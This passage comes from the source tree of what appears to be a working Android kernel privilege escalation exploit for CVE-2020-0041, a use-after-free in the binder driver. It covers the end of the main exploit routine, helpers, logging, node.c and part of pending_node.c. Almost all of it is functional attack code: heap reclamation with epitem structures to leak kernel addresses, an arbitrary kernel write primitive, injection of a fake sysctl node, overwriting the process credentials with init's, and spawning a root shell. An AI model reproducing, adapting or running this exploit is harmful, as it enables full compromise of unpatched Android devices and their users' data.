read64(kaddr) != 0xdeadbeefbadc0ded) { 631 | printf("[!] Something went wrong resolving the address of our mapping\n"); 632 | goto out; 633 | } 634 | 635 | 636 | /* Now we can prepare our magic sysctl node as s child of the left-most node */ 637 | 638 | uint64_t sysctl_table_root = kernel_base + SYSCTL_TABLE_ROOT_OFFSET; 639 | printf("[+] sysctl_table_root = %lx\n", sysctl_table_root); 640 | uint64_t ctl_dir = sysctl_table_root + 8; 641 | 642 | uint64_t node = read64(ctl_dir + 80); 643 | uint64_t prev_node; 644 | while (node != 0) { 645 | prev_node = node; 646 | node = read64(node + 0x10); 647 | } 648 | 649 | /* We found the insertion place, setup the node */ 650 | 651 | uint64_t node_kaddr = kaddr; 652 | void *node_uaddr = map; 653 | 654 | uint64_t tbl_header_kaddr = kaddr + 0x80; 655 | void *tbl_header_uaddr = map + 0x80; 656 | 657 | uint64_t ctl_table_kaddr = kaddr + 0x100; 658 | ctl_table_uaddr = map + 0x100; 659 | 660 | uint64_t procname_kaddr = kaddr + 0x200; 661 | void * procname_uaddr = map + 0x200; 662 | 663 | /* Setup rb_node */ 664 | *(uint64_t *)(node_uaddr + 0x00) = prev_node; // parent = prev_node 665 | *(uint64_t *)(node_uaddr + 0x08) = 0; // right = null 666 | *(uint64_t *)(node_uaddr + 0x10) = 0; // left = null 667 | 668 | *(uint64_t *)(node_uaddr + 0x18) = tbl_header_kaddr; // my_tbl_header 669 | 670 | *(uint64_t *)(tbl_header_uaddr) = ctl_table_kaddr; 671 | *(uint64_t *)(tbl_header_uaddr + 0x18) = 0; // unregistering 672 | *(uint64_t *)(tbl_header_uaddr + 0x20) = 0; // ctl_table_arg 673 | *(uint64_t *)(tbl_header_uaddr + 0x28) = sysctl_table_root; // root 674 | *(uint64_t *)(tbl_header_uaddr + 0x30) = sysctl_table_root; // set 675 | *(uint64_t *)(tbl_header_uaddr + 0x38) = sysctl_table_root + 8; // parent 676 | *(uint64_t *)(tbl_header_uaddr + 0x40) = node_kaddr; // node 677 | *(uint64_t *)(tbl_header_uaddr + 0x48) = 0; // inodes.first 678 | 679 | /* Now setup ctl_table */ 680 | uint64_t proc_douintvec = kernel_base + PROC_DOUINTVEC_OFFSET; 681 | *(uint64_t *)(ctl_table_uaddr) = procname_kaddr; // procname 682 | *(uint64_t *)(ctl_table_uaddr + 8) = kernel_base; // data == what to read/write 683 | *(uint32_t *)(ctl_table_uaddr + 16) = 0x8; 684 | *(uint64_t *)(ctl_table_uaddr + 0x20) = proc_douintvec; // proc_handler 685 | *(uint32_t *)(ctl_table_uaddr + 20) = 0666; // mode = rw-rw-rw- 686 | 687 | /* 688 | * Compute and write the node name. We use a random name starting with aaa 689 | * for two reasons: 690 | * 691 | * - Must be the first node in the tree alphabetically given where we insert it (hence aaa...) 692 | * 693 | * - If we already run, there's a cached dentry for each name we used earlier which has dangling 694 | * pointers but is only reachable through path lookup. If we'd reuse the name, we'd crash using 695 | * this dangling pointer at open time. 696 | * 697 | * It's easier to have a unique enough name instead of figuring out how to clear the cache, 698 | * which would be the cleaner solution here. 699 | */ 700 | 701 | int fd = open("/dev/urandom", O_RDONLY); 702 | uint32_t rnd; 703 | read(fd, &rnd, sizeof(rnd)); 704 | 705 | sprintf(procname_uaddr, "aaa_%x", rnd); 706 | sprintf(pathname, "/proc/sys/%s", procname_uaddr); 707 | 708 | /* And finally use a write8 to inject this new sysctl node */ 709 | struct exp_node *write8_sysctl = node_new("write8_sysctl"); 710 | node_write8(write8_sysctl, kaddr, prev_node + 16); 711 | 712 | /* Since our write is mirrored, let's clear the unwanted side-effect right away */ 713 | *(uint64_t *)(map + 8) = 0; 714 | 715 | printf("[+] Injected sysctl node!\n"); 716 | sleep(1); 717 | 718 | /* Set refcount to 0x100 and set our own credentials to init's */ 719 | write32(init_cred, 0x100); 720 | write64(current + REAL_CRED_OFFSET, init_cred); 721 | write64(current + REAL_CRED_OFFSET + 8, init_cred); 722 | 723 | if (getuid() != 0) { 724 | printf("[!!] Something went wrong, we're not root!!\n"); 725 | goto out; 726 | } 727 | 728 | /* Step Now we can clean things up. */ 729 | /* Cleanup the `sendmsg()` threads, which hold a reference to the freed 730 | * `binder_node`. 731 | */ 732 | struct exp_node *nodes[] = {write8_inode, write8_selinux, write8_sysctl}; 733 | for (int j = 0; j < 3; j++) { 734 | printf("[*] Node %s, pid %d, kaddr %lx\n", nodes[j]->name, nodes[j]->tid, nodes[j]->kaddr); 735 | if (!nodes[j]->tid) { 736 | printf("[*] Node %s has no thread id? \n", nodes[j]->name); 737 | continue; 738 | } 739 | /* Looking for pointers in the different nodes. */ 740 | uint64_t task = get_task_by_pid(init_task, nodes[j]->tid); 741 | if (!task) { 742 | printf("[!] Couldn't find task for pid %d\n", nodes[j]->tid); 743 | continue; 744 | } 745 | uint64_t kstack = read64(task + 0x28); 746 | 747 | for (int i = 0; i < 0x4000; i += 8) { 748 | if (read64(kstack + i) == nodes[j]->kaddr) { 749 | /* We overwrite with 0x10, as `kfree()` will not complain when encountering it, 750 | * contrary to the NULL ptr. 751 | */ 752 | log_info("[*] Replaced sendmmsg dangling reference\n"); 753 | write64(kstack + i, 0x10); 754 | } 755 | } 756 | 757 | kill(nodes[j]->tid, SIGKILL); 758 | waitpid(nodes[j]->tid, NULL, 0); 759 | } 760 | 761 | log_info("[+] Cleaned up sendmsg threads\n"); 762 | 763 | /* Bump up f_count to avoid entering into pipe_release() when exiting the process. */ 764 | write64(file_addr + 0x38, 0xff); 765 | 766 | /* Clear up our fake node */ 767 | write64(prev_node + 16, 0); 768 | 769 | /* We also smashed our epitem, try and restore that ... */ 770 | printf("[*] epitem.next = %lx\n", read64(file->kaddr + 88)); 771 | printf("[*] epitem.prev = %lx\n", read64(file->kaddr + 88 + 8)); 772 | 773 | // Just set next = prev, since we should be the only epitem here 774 | write64(file->kaddr + 88, read64(file->kaddr + 88 + 8)); 775 | 776 | /* Free all those pending nodes and threads */ 777 | node_free(file); 778 | node_free(epitem_node); 779 | node_free(write8_selinux); 780 | node_free(write8_inode); 781 | node_free(write8_sysctl); 782 | cleanup_realloc_threads(); 783 | 784 | 785 | 786 | /* We can finally enjoy our root shell. */ 787 | log_info("[*] Launching privileged shell\n"); 788 | char *args[] = {"/system/bin/sh", NULL}; 789 | char *envp[] = {"PATH=/sbin:/system/sbin:/product/bin:/apex/com.android.runtime/bin:/system/bin:/system/xbin:/odm/bin:/vendor/bin:/vendor/xbin", "ANDROID_DATA=/data", "HOSTNAME=root_by_cve-2020-0041", NULL}; 790 | execve(args[0], args, envp); 791 | return 0; 792 | 793 | out: 794 | printf("[!] Sleeping forever since it's not safe to exit now...\n"); 795 | while(1) sleep(10); 796 | return -1; 797 | } -------------------------------------------------------------------------------- /lpe/src/helpers.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 1 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | #include "helpers.h" 11 | #include "log.h" 12 | 13 | 14 | /* 15 | * Attach to a specific CPU. 16 | */ 17 | bool pin_cpu(int cpu) 18 | { 19 | cpu_set_t set; 20 | 21 | CPU_ZERO(&set); 22 | CPU_SET(cpu, &set); 23 | 24 | if (sched_setaffinity(0, sizeof(set), &set) < 0) { 25 | log_err("sched_setafinnity(): %s\n", strerror(errno)); 26 | return false; 27 | } 28 | 29 | return true; 30 | } 31 | -------------------------------------------------------------------------------- /lpe/src/log.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | ssize_t log_info(const char *format, ...) 7 | { 8 | va_list args; 9 | ssize_t len = 0; 10 | uint8_t buf[0x1000]; 11 | memset(buf, 0, 0x1000); 12 | va_start(args, format); 13 | len = vsnprintf(buf, INT_MAX, format, args); 14 | va_end(args); 15 | 16 | if (len > 0) 17 | write(1, buf, len); 18 | return len; 19 | } 20 | 21 | ssize_t log_err(const char *format, ...) 22 | { 23 | va_list args; 24 | ssize_t len = 0; 25 | uint8_t buf[0x1000]; 26 | memset(buf, 0, 0x1000); 27 | va_start(args, format); 28 | len = vsnprintf(buf, INT_MAX, format, args); 29 | va_end(args); 30 | 31 | if (len > 0) 32 | write(2, buf, len); 33 | return len; 34 | } 35 | 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /lpe/src/node.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | #include "binder.h" 11 | #include "binder_lookup.h" 12 | #include "log.h" 13 | #include "exploit.h" 14 | #include "endpoint.h" 15 | #include "node.h" 16 | 17 | /* 18 | * Create a vulnerable dangling node within the binder transaction. 19 | */ 20 | static struct exp_node *_node_new(struct exp_node *node, const char *name) 21 | { 22 | struct binder_state *bs = NULL; 23 | pthread_t *uaf_node_th = NULL; 24 | //uint32_t num_pending = 0x40; 25 | uint32_t num_pending = 0x40; 26 | uint64_t vma_start = 0; 27 | uint64_t handle = 0; 28 | 29 | if (!node || !name) 30 | return NULL; 31 | 32 | bs = binder_open(BINDER_DEVICE, 128 * 1024); 33 | if (!bs) { 34 | return NULL; 35 | } 36 | 37 | handle = grab_handle(bs, name); 38 | if (!handle) 39 | return NULL; 40 | 41 | /* Prepare the pending nodes array. */ 42 | uaf_node_th = calloc(num_pending + 1, sizeof(pthread_t)); 43 | if (!uaf_node_th) { 44 | log_err("[-] Unable to allocate new pending node thread array. Reason: '%s'\n", strerror(errno)); 45 | goto err; 46 | } 47 | 48 | vma_start = setup_pending_nodes(bs, handle, uaf_node_th, num_pending, 0); 49 | if (!vma_start) { 50 | log_err("[-] Bug trigger failed.\n"); 51 | goto err; 52 | } 53 | 54 | /* Initialize exp_node. */ 55 | node->bs = bs; 56 | node->vma_start = vma_start; 57 | memset(node->name, 0, sizeof(node->name)); 58 | strncpy(node->name, name, sizeof(node->name) - 1); 59 | node->handle = handle; 60 | node->th = uaf_node_th; 61 | node->idx = 0; 62 | node->num_pending = num_pending; 63 | node->max = num_pending; 64 | node->second = false; 65 | node->target_fd = -1; 66 | node->ep_fd = -1; 67 | 68 | return node; 69 | 70 | err: 71 | if (uaf_node_th) 72 | free(uaf_node_th); 73 | 74 | return NULL; 75 | } 76 | 77 | /* 78 | * Create a new `exp_node`. 79 | */ 80 | struct exp_node *node_new(const char *name) 81 | { 82 | struct exp_node *node = NULL; 83 | 84 | node = calloc(1, sizeof(*node)); 85 | if (!node) { 86 | log_err("[-] Unable to allocate new node. Reason: '%s'\n", strerror(errno)); 87 | return NULL; 88 | } 89 | 90 | /* Need to bootstrap the associated endpoint. */ 91 | bootstrap_endpoint(name); 92 | 93 | if (!_node_new(node, name)) { 94 | free(node); 95 | return NULL; 96 | } 97 | 98 | return node; 99 | } 100 | 101 | /* 102 | * Free all pending node threads. 103 | */ 104 | void node_free_pending_nodes(struct exp_node *node) 105 | { 106 | int i; 107 | 108 | /* Terminate all pending nodes. */ 109 | for (i = 0; i < node->num_pending; i++) { 110 | pending_node_terminate(node->bs, node->handle, node->th[i]); 111 | } 112 | 113 | } 114 | 115 | /* 116 | * Free an exp_node, and the associated binder endpoint and pending 117 | * transactions as well. The only way to safely remove a dangling 118 | * `binder_node` from the `binder_proc` is to close the associated 119 | * file descriptor. 120 | */ 121 | static void _node_free(struct exp_node *node, bool reset) 122 | { 123 | 124 | int i; 125 | int n = node->num_pending; 126 | 127 | /* Terminate all pending nodes. */ 128 | for (i = 0; i < n; i++) { 129 | pending_node_terminate(node->bs, node->handle, node->th[i]); 130 | } 131 | 132 | /* Close binder. */ 133 | binder_close(node->bs); 134 | 135 | /* Close the remaining epitem if exists. */ 136 | if (node[0].ep_fd != -1) 137 | close(node[0].ep_fd); 138 | 139 | /* Reset the associated endpoint. */ 140 | if (reset) { 141 | //endpoint_reset(node->name); 142 | terminate_endpoint(node->name); 143 | bootstrap_endpoint(node->name); 144 | } else { 145 | terminate_endpoint(node->name); 146 | /* Free the memory associated with the node. */ 147 | free(node->th); 148 | free(node); 149 | } 150 | } 151 | 152 | /* 153 | * Free an `exp_node` and terminate the associated 154 | * endpoint. 155 | */ 156 | void node_free(struct exp_node *node) 157 | { 158 | _node_free(node, false); 159 | } 160 | 161 | /* 162 | * Reset an `exp_node` by restarting the remote endpoint. 163 | */ 164 | bool node_reset(struct exp_node *node) 165 | { 166 | uint8_t name[16]; 167 | 168 | memset(name, 0, sizeof(name)); 169 | strncpy(name, node->name, sizeof(name)-1); 170 | _node_free(node, true); 171 | 172 | /* Reinit node. */ 173 | if (_node_new(node, name)) 174 | return true; 175 | 176 | return false; 177 | } 178 | 179 | /* 180 | * Use the vulnerable to decrement the refcount of the underlying `binder_node` and have it eventually 181 | * be `kfree()`ed. 182 | */ 183 | void node_kfree(struct exp_node *node) 184 | { 185 | if (!node) 186 | return; 187 | 188 | pending_node_free(node->bs, node->handle, node->vma_start, node->num_pending + 1, 1, node->second); 189 | } 190 | 191 | 192 | 193 | #define NEPITEMS 0x20 194 | 195 | /* 196 | * This function is used to disclose a `file` structure from a given file descriptor. 197 | * It relies on the fact that we can leak data at offset 0x58 and 0x60 a `binder_node`, which 198 | * exactly overlap with linked list pointer of epitem structure pointing to the 'file' we 199 | * gave in parameter to `EPOLLCTL_ADD` 200 | */ 201 | static bool _disclose_file_addr(struct exp_node *node, int *ep_arr, int n) 202 | { 203 | uint64_t file_addr = 0; 204 | uint64_t origA, origB, A, B; 205 | int idx = -1; 206 | int i; 207 | 208 | if (!node || !ep_arr) 209 | return 0; 210 | 211 | /* leak the original value. */ 212 | node_leak(node, &origA, &origB); 213 | 214 | if (origA == 0 || origB == 0 || origB == 0xdead000000000200) 215 | return 0; 216 | 217 | /* Close the epitems by starting by the end of the array. */ 218 | i = n - 1; 219 | bool found = false; 220 | while (i >= 0) { 221 | /* Close 1 epitem. */ 222 | close(ep_arr[i]); 223 | ep_arr[i] = -1; 224 | 225 | /* Leak the result to see if something changed. */ 226 | node_leak(node, &A, &B); 227 | if (!found && (A != origA || B != origB)) { 228 | if (B == 0xdead000000000200) { 229 | return false; 230 | } 231 | idx = i - 1; 232 | i--; 233 | found = true; 234 | } 235 | i--; 236 | } 237 | 238 | /* Leak our values, we should have something interesting. */ 239 | node_leak(node, &A, &B); 240 | 241 | node->file_addr = A - 0xd8; 242 | node->ep_fd = ep_arr[idx]; 243 | 244 | return true; 245 | } 246 | 247 | /* 248 | * Free a `binder_node` and reallocates an `epitem` structure 249 | * in its place. 250 | */ 251 | bool node_realloc_epitem(struct exp_node *node, int fd) 252 | { 253 | bool res = false; 254 | struct epoll_event evt; 255 | uint64_t file_addr = 0; 256 | int ep_arr[NEPITEMS + 1]; 257 | int i, j, k, n; 258 | 259 | if (!node) 260 | return false; 261 | 262 | /* Prepare epoll structure. */ 263 | bzero(&evt, sizeof(evt)); 264 | evt.events = EPOLLIN; 265 | 266 | for (i = 0; i < NEPITEMS; i++) 267 | ep_arr[i] = -1; 268 | 269 | evt.data.fd = fd; 270 | epoll_ctl(ep_arr[0], EPOLL_CTL_ADD, fd, &evt); 271 | 272 | /* Allocate the epitems. */ 273 | for (i = 0; i < NEPITEMS; i++) { 274 | int ep = epoll_create1(0); 275 | if (ep < 0) { 276 | log_err("epoll_create1: '%s'\n", strerror(errno)); 277 | goto cleanup; 278 | } 279 | 280 | ep_arr[i] = ep; 281 | } 282 | 283 | /* Free the `binder_node`. */ 284 | node_kfree(node); 285 | 286 | /* Try to reallocate with `struct epitem`. */ 287 | for (i = 1; i < NEPITEMS; i++) { 288 | evt.data.fd = fd; 289 | epoll_ctl(ep_arr[i], EPOLL_CTL_ADD, fd, &evt); 290 | } 291 | 292 | if (!_disclose_file_addr(node, ep_arr, NEPITEMS)) 293 | goto cleanup; 294 | 295 | node->target_fd = fd; 296 | 297 | return true; 298 | 299 | cleanup: 300 | for (i = 0; i < NEPITEMS; i++) { 301 | if (ep_arr[i] != -1) 302 | close(ep_arr[i]); 303 | } 304 | 305 | return res; 306 | } 307 | 308 | 309 | /* 310 | * Disclose the kernel address of a `binder_node` by relying on 2 `binder_node` 311 | * whose content has been replaced by `epitem` structure. 312 | * We close the sprayed `epitem` structure, until we are sure about which epitem has 313 | * replace the content of our `binder_node`. By controlling 2 epitem which points back to each 314 | * other, we can disclose the content of both `binder_node` by reading the `prev` and `next` field 315 | * of the `epitem` structure, which in this case point to each other. 316 | */ 317 | bool node_kaddr_disclose(struct exp_node *node1, struct exp_node *node2) 318 | { 319 | 320 | uint64_t a0; 321 | uint64_t b0; 322 | uint64_t b1; 323 | uint64_t a1; 324 | 325 | if (!node1->file_addr || node1->target_fd == -1 || node2->target_fd != -1) 326 | return false; 327 | 328 | /* The node needs to be single. */ 329 | node_leak(node1, &a0, &b0); 330 | if (a0 != b0) 331 | return false; 332 | 333 | while (!node_realloc_epitem(node2, node1->target_fd)) 334 | node_reset(node2); 335 | 336 | /* Looks good, let's disclose the respective kaddrs. */ 337 | node_leak(node1, &a0, &b0); 338 | node_leak(node2, &a1, &b1); 339 | 340 | if (a0 == b1) { 341 | node1->kaddr = a1 - 0x58; 342 | node2->kaddr = b0 - 0x58; 343 | } else if (b0 == a1) { 344 | node2->kaddr = a0 - 0x58; 345 | node1->kaddr = b1 - 0x58; 346 | } else { 347 | return false; 348 | } 349 | 350 | return true; 351 | } 352 | 353 | 354 | /* 355 | * Free an epitem structure, by closing the file descriptor. 356 | * The only trouble here is the fact that it's freed using 357 | * `call_rcu()` which introduced indetermism when trying to replace 358 | * the freed content. 359 | */ 360 | bool node_free_epitem(struct exp_node *node) 361 | { 362 | if (!node || node->ep_fd == -1) 363 | return false; 364 | 365 | close(node->ep_fd); 366 | node->ep_fd = -1; 367 | /* Allow the CPU to enter quiescent state and free the `epitem`. */ 368 | usleep(10000); 369 | 370 | return true; 371 | } 372 | 373 | 374 | /* 375 | * This function is a little bit complicated (slow?), as it needs to replace a 376 | * `binder_node` with an epitem first, to disclose its kernel address, and then replace it 377 | * with controlled content using the `sendmsg()` threads to do so. The only trouble being 378 | * that the `epitem` structure is freed using `call_rcu()` which introduces indetermism. Therefore 379 | * it gets tricky to reliably reallocate the content of the `binder_node`. 380 | */ 381 | bool node_realloc_content(struct exp_node *node, void *data, size_t size) 382 | { 383 | bool res = false; 384 | uint64_t origA, A, B; 385 | 386 | if (!node) 387 | return false; 388 | 389 | 390 | setup_realloc_buffer(data, size); 391 | 392 | origA = *(uint64_t *)(data + 0x58); 393 | 394 | 395 | /* Decide which course of action to take. */ 396 | 397 | 398 | /* Do we have an overlay with an epitem? */ 399 | if (node->ep_fd != -1) { 400 | // Easy, just free the epitem. 401 | close(node->ep_fd); 402 | usleep(10000); 403 | node->ep_fd = -1; 404 | } else if (node->tid) { 405 | //DO we really want to do that? 406 | log_info("node->tid!!!!\n"); 407 | reset_realloc_threads(); 408 | return false; 409 | } else { 410 | /* It hasn't been freed, so just kfree it. */ 411 | node_kfree(node); 412 | } 413 | 414 | /* Let the threads spray kmalloc() with controlled content. */ 415 | realloc_barrier_wait(); 416 | /* Wait a little bit.*/ 417 | 418 | /* Leak new node value and hope for the best. */ 419 | node_leak(node, &A, &B); 420 | 421 | /* Double check to see if the node content was realloc properly. */ 422 | if (A == origA) { 423 | res = true; 424 | 425 | if (discard_realloc_thread(B)) 426 | node->tid = B; 427 | } 428 | 429 | reset_realloc_threads(); 430 | 431 | return res; 432 | } 433 | 434 | 435 | /* 436 | * Trigger a write8 and overwrite and arbitrary location with a controlled value. 437 | * As above, we need to go through the cycle of replacing a `binder_node` with an epitem 438 | * and then with controlled content from the `sendmsg()` threads. 439 | */ 440 | bool node_write8(struct exp_node *node, uint64_t what, uint64_t where) 441 | { 442 | struct exp_node *dummy = NULL; 443 | int pfd[2]; 444 | uint8_t data[0x80]; 445 | 446 | if (!node) 447 | return false; 448 | 449 | if (node->idx == node->num_pending) 450 | return false; 451 | 452 | memset(data, 0, 0x80); 453 | 454 | *(uint64_t *)(data + 0x20) = what; 455 | *(uint64_t *)(data + 0x28) = where; 456 | *(uint64_t *)(data + 0x30) = 0; 457 | *(uint64_t *)(data + 0x38) = 0; /* proc == NULL */ 458 | *(uint64_t *)(data + 0x40) = 0; /* No refs. */ 459 | *(uint32_t *)(data + 0x48) = 0; /* Internal strong refs. */ 460 | *(uint32_t *)(data + 0x4c) = 0; /* local_weak_refs == 0. */ 461 | *(uint32_t *)(data + 0x50) = 1; /* local strong refs. */ 462 | *(uint32_t *)(data + 0x54) = 0; /* tmp_refs == 0. */ 463 | *(uint64_t *)(data + 0x58) = 0x4444444444444444; /* Used by node_realloc_content to verify replacement */ 464 | *(uint64_t *)(data + 0x68) = 0; /* has_strong_refs == 0 && has_weak_refs == 0 */ 465 | 466 | /* Create dummy node. */ 467 | dummy = node_new("dummy"); 468 | pipe(pfd); 469 | 470 | /* Overlay an epitem. */ 471 | while (!node_realloc_epitem(dummy, pfd[0])) 472 | node_reset(dummy); 473 | 474 | 475 | /* Do we know the node kaddr yet? */ 476 | if (!node->kaddr) { 477 | /* Drop the current epitem. */ 478 | node_free_epitem(node); 479 | 480 | 481 | /* Use the previous'dummy' node to disclose both 482 | * dummy and node kaddr. 483 | */ 484 | node_kaddr_disclose(dummy, node); 485 | } 486 | 487 | /* update the kaddr values to bypass safe unlinking. */ 488 | *(uint64_t *)(data + 0x8) = node->kaddr + 0x8; 489 | *(uint64_t *)(data + 0x10) = node->kaddr + 0x8; 490 | 491 | log_info("[*] Reallocating content of '%s' with controlled data.", node->name); 492 | while (!node_realloc_content(node, data, 0x80)) { 493 | log_info("."); 494 | node_reset(node); 495 | while (!node_kaddr_disclose(dummy, node)) { 496 | node_reset(node); 497 | } 498 | 499 | /* Update values. */ 500 | *(uint64_t *)(data + 0x8) = node->kaddr + 0x8; 501 | *(uint64_t *)(data + 0x10) = node->kaddr + 0x8; 502 | } 503 | 504 | if (dummy) { 505 | node_free(dummy); 506 | close(pfd[0]); 507 | close(pfd[1]); 508 | } 509 | log_info("[DONE]\n"); 510 | 511 | /* Perform the actual write8, all the code before was for setup... */ 512 | log_info("[+] Overwriting 0x%llx with 0x%llx...", where, what); 513 | pending_node_write8(node->th[node->idx - 1]); 514 | log_info("[DONE]\n"); 515 | 516 | return true; 517 | } 518 | 519 | 520 | /* 521 | * Trigger a write8 primitive and overwrite an arbitrary location with a NULL value. 522 | * Assumes the binder node associated with `node` has just been freed, and its kernel 523 | * address has been previously disclosed. 524 | */ 525 | bool node_write_null(struct exp_node *node, uint64_t where) 526 | { 527 | return node_write8(node, 0, where); 528 | } 529 | 530 | 531 | bool node_leak(struct exp_node *node, uint64_t *A, uint64_t *B) 532 | { 533 | if (!node || node->idx == node->num_pending) 534 | return false; 535 | 536 | pending_node_leak(node->th[node->idx++], A, B); 537 | 538 | return true; 539 | } 540 | 541 | -------------------------------------------------------------------------------- /lpe/src/pending_node.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #include "log.h" 9 | #include "binder.h" 10 | #include "endpoint.h" 11 | #include "pending_node.h" 12 | 13 | static struct pending_node *pending_nodes = NULL; 14 | static uint64_t last_node_th = 0; 15 | 16 | static struct pending_node *pending_node_new(void) 17 | { 18 | struct pending_node *node = NULL; 19 | 20 | node = malloc(sizeof(*node)); 21 | if (!node) { 22 | log_err("malloc: %s\n", strerror(errno)); 23 | return NULL; 24 | } 25 | 26 | memset(node, 0, sizeof(*node)); 27 | 28 | if (pthread_barrier_init(&node->barrier, NULL, 2)) { 29 | log_err("pthread_barrier_init: %s\n", strerror(errno)); 30 | free(node); 31 | return NULL; 32 | } 33 | 34 | if (pthread_barrier_init(&node->ready, NULL, 2)) { 35 | log_err("pthread_barrier_init: %s\n", strerror(errno)); 36 | free(node); 37 | return NULL; 38 | } 39 | 40 | if (pthread_barrier_init(&node->do_barrier, NULL, 2)) { 41 | log_err("pthread_barrier_init: %s\n", strerror(errno)); 42 | free(node); 43 | return NULL; 44 | } 45 | 46 | if (pthread_barrier_init(&node->done_barrier, NULL, 2)) { 47 | log_err("pthread_barrier_init: %s\n", strerror(errno)); 48 | free(node); 49 | return NULL; 50 | } 51 | 52 | 53 | /* Insert in front. */ 54 | node->next = pending_nodes; 55 | pending_nodes = node; 56 | 57 | return node; 58 | } 59 | 60 | static struct pending_node *pending_node_get(pthread_t node_th) 61 | { 62 | struct pending_node *tmp = pending_nodes; 63 | 64 | while (tmp) { 65 | if (tmp->uaf_node_th == node_th) 66 | return tmp; 67 | tmp = tmp->next; 68 | } 69 | 70 | return NULL; 71 | } 72 | 73 | /* 74 | * This thread keep a reference to the freed binder_node, which allows leaking a qword at offset 0x58 75 | * and 0x60 of an object in the kmalloc-128 slab, as well a trigerring a controlled write8 76 | */ 77 | void *pending_node_thread(void *args) 78 | { 79 | struct pending_node *node = (struct pending_node *)args; 80 | uint32_t remaining = 0, consumed = 0; 81 | uint32_t looper = BC_ENTER_LOOPER; 82 | struct binder_io msg, reply; 83 | struct binder_state *from = node->bs; 84 | uint64_t handle = node->uaf_node; 85 | uint8_t msg_data[0x1000], reply_data[0x1000]; 86 | uint64_t res = -1; 87 | int signo; 88 | sigset_t set; 89 | uint64_t retval = 0; 90 | 91 | /* Enter looper. */ 92 | binder_write(from, &looper, sizeof(looper)); 93 | 94 | struct binder_transaction_data *t = (struct binder_transaction_data *)(msg_data + sizeof(uint32_t)); 95 | make_transaction(msg_data, false, handle, reply_data, 0x10, NULL, 0); 96 | /* Fix transaction code. */ 97 | t->code = ADD_PENDING_NODE; 98 | /* Make the call. */ 99 | binder_write(from, msg_data, sizeof(*t) + sizeof(uint32_t)); 100 | 101 | /* Poll for the answer. */ 102 | /* Wait for BR_TRANSACTION_COMPLETE. */ 103 | struct pollfd pfd; 104 | pfd.fd = from->fd; 105 | pfd.events = POLLIN; 106 | /* Wait up to a sec. */ 107 | if (!poll(&pfd, 1, 1000)) { 108 | fprintf(stderr, "[-] Something went wrong will inserting the pending node.\n"); 109 | pthread_exit(&res); 110 | } 111 | 112 | pthread_barrier_wait(&node->ready); 113 | 114 | pthread_barrier_wait(&node->ready); 115 | 116 | /* We wait here, until ask by the exploit to leak values from the transaction. */ 117 | pthread_barrier_wait(&node->do_barrier); //Do leak 118 | 119 | /* Reading back transaction. */ 120 | consumed = remaining = 0; 121 | uint32_t cmd; 122 | do { 123 | cmd = binder_read_next(from, reply_data, &remaining, &consumed); 124 | } while (cmd != BR_TRANSACTION && cmd != BR_REPLY); 125 | 126 | /* Getting a BR_REPLY, would mean that we successfully cleaned up the transaction. */ 127 | if (cmd == BR_REPLY) { 128 | goto end; 129 | } 130 | 131 | t = (struct binder_transaction_data *)(reply_data + consumed - sizeof(*t)); 132 | /* data at offset 0x58. */ 133 | node->uaf_buffer = t->data.ptr.buffer; 134 | 135 | node->leaked_data[0] = t->target.ptr; /* data at offset 0x58. */ 136 | node->leaked_data[1] = t->cookie; /* data at offset 0x60. */ 137 | 138 | /* Check the node state. */ 139 | if (node->state == NODE_FINISHED) 140 | goto end; 141 | 142 | node->state = NODE_LEAKED; 143 | 144 | pthread_barrier_wait(&node->done_barrier); 145 | pthread_barrier_wait(&node->ready); 146 | 147 | /* This for sync. */ 148 | 149 | pthread_barrier_wait(&node->do_barrier); 150 | 151 | /* Check the node state. */ 152 | if (node->state == NODE_FINISHED) 153 | goto end; 154 | 155 | 156 | /* If we decide to go ahead with the buffer freeing, wait on the barrier, 157 | * otherwise just exit the thread. 158 | */ 159 | binder_free_buffer(from, node->uaf_buffer); 160 | node->state = NODE_FREE; 161 | end: 162 | pthread_barrier_wait(&node->done_barrier); 163 | ioctl(node->bs->fd, BINDER_THREAD_EXIT, 0); 164 | pthread_exit(&retval); 165 | } 166 | 167 | 168 | 169 | static void pending_node_create_thread(void *args) 170 | { 171 | struct binder_state *bs = (struct binder_state *)*(uint64_t *)args; 172 | uint64_t node = *(uint64_t *)(args + 8); 173 | 174 | /* Create a ONE_WAY transaction to ask the endpoint to create a pending_node 175 | * back to us. 176 | */ 177 | struct binder_transaction_data *t; 178 | uint8_t rdata[128]; 179 | uint8_t txn_data[128]; 180 | 181 | uint32_t remaining = 0, consumed = 0; 182 | struct binder_io msg, reply; 183 | 184 | /* Register this thread as a looper. */ 185 | uint32_t looper = BC_ENTER_LOOPER; 186 | binder_write(bs, &looper, sizeof(looper)); 187 | 188 | 189 | /* Send the ONE_WAY transaction. */ 190 | t = (struct binder_transaction_data *)(txn_data + sizeof(uint32_t)); 191 | make_transaction(txn_data, true, node, rdata, 0x8, NULL, 0); 192 | /* Fix transaction code. */ 193 | t->code = ADD_PENDING_NODE; 194 | // printf("[*] About to make node\n"); 195 | // getchar(); 196 | /* Make the binder call. */ 197 | binder_write(bs, txn_data, sizeof(*t) + sizeof(uint32_t)); 198 | 199 | /* Wait for the transaction from the endpoint. */ 200 | while (binder_read_next(bs, rdata, &remaining, &consumed) != BR_TRANSACTION); 201 | 202 | 203 | // printf("[*] Node should be made\n"); 204 | // getchar(); 205 | 206 | /* Get transaction. */ 207 | t = (struct binder_transaction_data *)(rdata + consumed - sizeof(*t)); 208 | 209 | if (t->code != ADD_PENDING_NODE) { 210 | fprintf(stderr, "[-] Invalid transaction code %x. Expected %x\n", t->code, ADD_PENDING_NODE); 211 | exit(1); 212 | } 213 | 214 | /* Free the buffer. */ 215 | binder_free_buffer(bs, t->data.ptr.buffer); 216 | 217 | /* Okay, so instead of a reply, we send a new transaction here, in order to have the thing go into the pending node list. */ 218 | t = (struct binder_transaction_data *)(txn_data + sizeof(uint32_t)); 219 | make_transaction(txn_data, false, node, rdata, 0x10, NULL, 0); 220 | /* Fix transaction code. */ 221 | t->code = ADD_PENDING_NODE; 222 | /* Make the call. */ 223 